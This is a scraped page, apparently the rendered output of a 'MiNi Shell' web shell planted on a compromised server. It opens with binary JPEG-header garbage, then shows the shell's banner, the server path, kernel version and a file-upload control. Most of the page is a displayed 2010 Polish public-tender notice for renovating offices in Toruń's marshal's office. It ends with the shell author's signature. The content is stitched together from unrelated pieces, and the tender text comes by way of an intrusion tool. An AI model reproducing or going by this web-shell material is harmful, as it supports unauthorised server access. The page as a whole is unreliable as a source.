JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/12440-N-2010.html

<p class="kh_header"><b>Toruń: Zaprojektowanie i remont korytarza i pomieszczeń biurowych 317, 318, 331, 332, 333 oraz wymian drzwi w pomieszczeniach biurowych 316, 333a, pomieszczeniu gospodarczym i korytarzu, wymiana stolarki okiennej w pomieszczeniu 316 oraz zaprojektowanie i remont 2 istniejących łazienek i zmianę  funkcji 1 pomieszczenia biurowego na łazienkę na II piętrze budynku Urzędu Marszałkowskiego oraz wymianę stolarki okiennej w tych pomieszczeniach</b><br>
<b>Numer ogłoszenia: 12440 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Marszałkowski Województwa Kujawsko-Pomorskiego , Plac Teatralny 2, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 0-56 62 18 249, faks 56 62 18 347.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kujawsko-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i remont korytarza i pomieszczeń biurowych 317, 318, 331, 332, 333 oraz wymian drzwi w pomieszczeniach biurowych 316, 333a, pomieszczeniu gospodarczym i korytarzu, wymiana stolarki okiennej w pomieszczeniu 316 oraz zaprojektowanie i remont 2 istniejących łazienek i zmianę  funkcji 1 pomieszczenia biurowego na łazienkę na II piętrze budynku Urzędu Marszałkowskiego oraz wymianę stolarki okiennej w tych pomieszczeniach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
1.1	Zaprojektowanie i remont korytarza i pomieszczeń biurowych 317, 318, 331, 332, 333 oraz wymian drzwi w pomieszczeniach biurowych 316, 333a, pomieszczeniu gospodarczym i korytarzu, wymiana stolarki okiennej w pomieszczeniu 316 zgodnie z programem funkcjonalno użytkowym I stanowiącym załącznik nr 3 do SIWZ, zgodnie z wymaganiami określonymi w niniejszej Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ oraz w pozostałych  załącznikach.

1.2	zaprojektowanie i remont zlokalizowanych na II piętrze budynku Urzędu Marszałkowskiego 2 istniejących łazienek i zmiana funkcji 1 pomieszczenia  biurowego na łazienkę oraz wymiana stolarki okiennej w tych pomieszczeniach zgodnie z programem funkcjonalno użytkowym II stanowiącym załącznik nr 4 do SIWZ, zgodnie z wymaganiami określonymi w niniejszej Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ oraz w pozostałych załącznikach..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.21.55.00-2, 45.26.27.00-8, 45.11.11.00-9, 45.00.00.00-7, 45.45.30.00-7, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.26.25.00-6, 45.31.70.00-2, 45.31.00.00-3, 45.33.00.00-9, 45.33.11.00-7, 45.33.12.20-4, 45.43.10.00-7, 45.43.21.11-5, 45.42.11.46-9, 45.45.00.00-6, 45.33.11.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w kwocie 8.000,00 zł (słownie: osiem tysięcy złotych, 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, udokumentowane urzędowymi dokumentami z Krajowego Rejestru Sądowego lub ewidencji działalności gospodarczej, Krajowego Rejestru Karnego, Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, Urzędu Skarbowego, o których mowa w rozdz. V pkt 1 SIWZ,
2.	posiadania wiedzy i doświadczenia tj. 
wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane w obiekcie podlegającym ochronie konserwatora zabytków o wartości, co najmniej 300.000,00 zł brutto wraz z potwierdzeniem, że roboty te zostały wykonane należycie.
3.	dysponowania potencjałem technicznym oraz  osobami zdolnymi do wykonywania zamówienia tj. osobami posiadającymi uprawnienia w specjalności:
a)	konstrukcyjno - budowlanej do projektowania i kierowania robotami budowlanymi związanymi z obiektem budowlanym bez ograniczeń,
b)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, bez ograniczeń do projektowania obiektu budowlanego i kierowania robotami budowlanymi,
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń do projektowania obiektu budowlanego i kierowania robotami budowlanymi związanymi z obiektem budowlanym,
d)	telekomunikacyjnej bez ograniczeń do projektowania i kierowania robotami
które są członkami właściwej izby samorządu zawodowego (wymagane minimum - po jednej osobie z minimum 3-letnim doświadczeniem z uprawnieniami budowlanymi).
4.	sytuacji ekonomicznej i finansowej, przy założeniu, że zapłata za wykonanie zamówienia dokonywana będzie zgodnie z treścią wzoru umowy stanowiącego załącznik nr 5 do SIWZ, potwierdzone polisą ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej gospodarczej
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdziale V niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. 
Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania. 
2.	Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnienie warunków, o których mowa w art. 22 ust. 1 tj. określonych w dziale IV pkt.1 ppkt 1-4 SIWZ, i brak podstaw do wykluczenia z powodu niespełniania warunków o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty:
1.1.	oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, którego treść zawarto w załączniku nr 1A do SIWZ,
1.2.	oświadczenie Wykonawcy o braku podstaw do wykluczenia z powodu niespełnienia warunków o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych, którego treść zawarto w załączniku nr 1B do SIWZ,
1.3.	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.4.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.5.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.6.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 (odpowiedzialność podmiotów zbiorowych) ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.7.	wykaz wykonanych robót budowlanych odpowiadających swoim rodzajem i wartością wymaganiom określonym przez Zamawiającego w rozdziale IV  SIWZ, z podaniem ich odbiorców, przedmiotu łącznie z określeniem wartości, dat wykonania oraz załączenie dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje);
1.8.	wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonywanych przez nich czynności, zgonie z wymaganiami określonymi w rozdziale IV pkt. 1 ppkt 3 SIWZ.
1.9.	Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej gospodarczej

UWAGA:	 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w niniejszym rozdziale w pkt 1 ppkt-y: 1.3, 1.4, 1.6 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a. 	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b. 	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
- wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c. 	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne 
i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
Zamiast dokumentu, o którym mowa w pkt 1 ppkt 1.5 składa się zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Wymagania w zakresie terminów wydania tych dokumentów stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kujawsko-pomorskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Województwo Kujawsko-Pomorskie
Urząd Marszałkowski Województwa Kujawsko-Pomorskiego
Pl. Teatralny 2, 87-100 Toruń
Pok. 338.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2010 godzina 09:00, miejsce: Urząd Marszałkowski Województwa Kujawsko-Pomorskiego
Pl. Teatralny 2, 87-100 Toruń
Pok. 338.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.

Wymagany termin realizacji: 
1)	przedstawienie Zamawiającemu projektów w ciągu 7 dni roboczych od dnia zawarcia umowy; Wykonawca zobligowany jest niezwłocznie po uzgodnieniu projektów z Zamawiającym do złożenia właściwych dokumentów w Urzędzie Miasta w Toruniu (pozwolenie na budowę), o czym winien zawiadomić Zamawiającego;
2)	4 tygodnie od uprawomocnienia się  decyzji pozwolenia na budowę - realizacja prac budowlano-remontowych określonych w dziale II pkt. 1 ppkt 1.1 SIWZ, z zastrzeżeniem pkt 3;
3)	2 tygodnie od uzgodnienia projektów - wykonanie robót objętych aktualnym zgłoszeniem tj. robót określonych w dziale II pkt 1 ppkt 1.2 SIWZ;
Ostateczny termin wykonania całości przedmiotu umowy nie może nastąpić później niż do dnia 14 maja 2010 roku.

Do oferty Wykonawca dołącza, oprócz dokumentów, o których mowa w sekcji III:
1.Wypełniony formularz ofertowy stanowiący załącznik nr 2 do  SIWZ zawierający cenę ofertową,
2.podpisany (zaparafowany) na każdej zapisanej stronie wzór umowy, stanowiący załącznik
nr 5 do  SIWZ;

Creat By MiNi SheLL
Email: jattceo@gmail.com